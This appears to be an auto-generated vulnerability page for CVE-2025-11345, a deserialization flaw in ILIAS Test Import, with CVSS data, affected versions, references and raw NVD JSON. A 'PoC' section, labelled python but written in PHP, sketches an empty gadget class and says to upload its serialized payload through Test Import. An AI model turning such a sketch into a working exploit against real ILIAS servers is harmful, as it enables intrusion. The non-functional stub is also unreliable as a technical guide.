CVE-2025-11345

Description

A flaw has been found in ILIAS up to 8.23/9.13/10.1. Affected by this issue is the function unserialize of the component Test Import. This manipulation causes deserialization. It is possible to initiate the attack remotely. Upgrading to version 8.24, 9.14 and 10.2 can resolve this issue. Upgrading the affected component is advised.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ilias:ilias:8.23:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ilias:ilias:9.13:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ilias:ilias:10.1:*:*:*:*:*:*:* - VULNERABLE

ILIAS <= 8.23

ILIAS 9.x <= 9.13

ILIAS 10.x <= 10.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// CVE-2025-11345 - ILIAS Test Import Deserialization PoC
// This PoC demonstrates the concept of exploiting the unserialize() vulnerability
// in ILIAS Test Import component.

// Step 1: Craft a malicious serialized payload
// The payload targets PHP magic methods to achieve code execution

class ExploitChain {
    // Example gadget chain - actual exploitation requires identifying
    // available classes in the target ILIAS installation
    private $command;
    
    public function __construct($cmd) {
        $this->command = $cmd;
    }
    
    // __destruct is triggered during unserialization cleanup
    public function __destruct() {
        // This is where the malicious action would occur
        // In real exploitation, this would leverage existing ILIAS classes
        // to execute system commands or read/write files
    }
}

// Step 2: Serialize the malicious object
$payload = serialize(new ExploitChain("id"));

// Step 3: The serialized payload would be embedded in a test import file
// (e.g., XML or QTI format used by ILIAS Test Import)
// and uploaded through the Test Import functionality

// Step 4: When ILIAS processes the import, unserialize() is called
// on the user-controlled data, triggering the exploit chain
$decoded = unserialize($payload);

echo "PoC payload generated: " . $payload . "\n";
echo "Upload this payload via ILIAS Test Import to trigger CVE-2025-11345\n";
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11345
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11345
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11345/
[4] VulDB https://vuldb.com/cve/CVE-2025-11345
[5] https://docu.ilias.de/go/blog/15821/882
[6] https://vuldb.com/?ctiid.327230
[7] https://vuldb.com/?id.327230
[8] https://vuldb.com/?submit.664891
[9] https://srlabs.de/blog/breaking-ilias-part-2-three-to-rce

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11345", "sourceIdentifier": "[email protected]", "published": "2025-10-06T19:15:34.703", "lastModified": "2026-01-23T19:15:52.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in ILIAS up to 8.23/9.13/10.1. Affected by this issue is the function unserialize of the component Test Import. This manipulation causes deserialization. It is possible to initiate the attack remotely. Upgrading to version 8.24, 9.14 and 10.2 can resolve this issue. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-502"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:8.23:*:*:*:*:*:*:*", "matchCriteriaId": "58F9FBA3-89C9-4EC7-9913-770F9C71A569"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:9.13:*:*:*:*:*:*:*", "matchCriteriaId": "BE5461D9-97C8-4DEE-8E3D-AAEE8840A209"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:10.1:*:*:*:*:*:*:*", "matchCriteriaId": "B4E16B93-654E-47D4-A498-C759D1F4B1EB"}]}]}], "references": [{"url": "https://docu.ilias.de/go/blog/15821/882", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.327230", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327230", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664891", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://srlabs.de/blog/breaking-ilias-part-2-three-to-rce", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}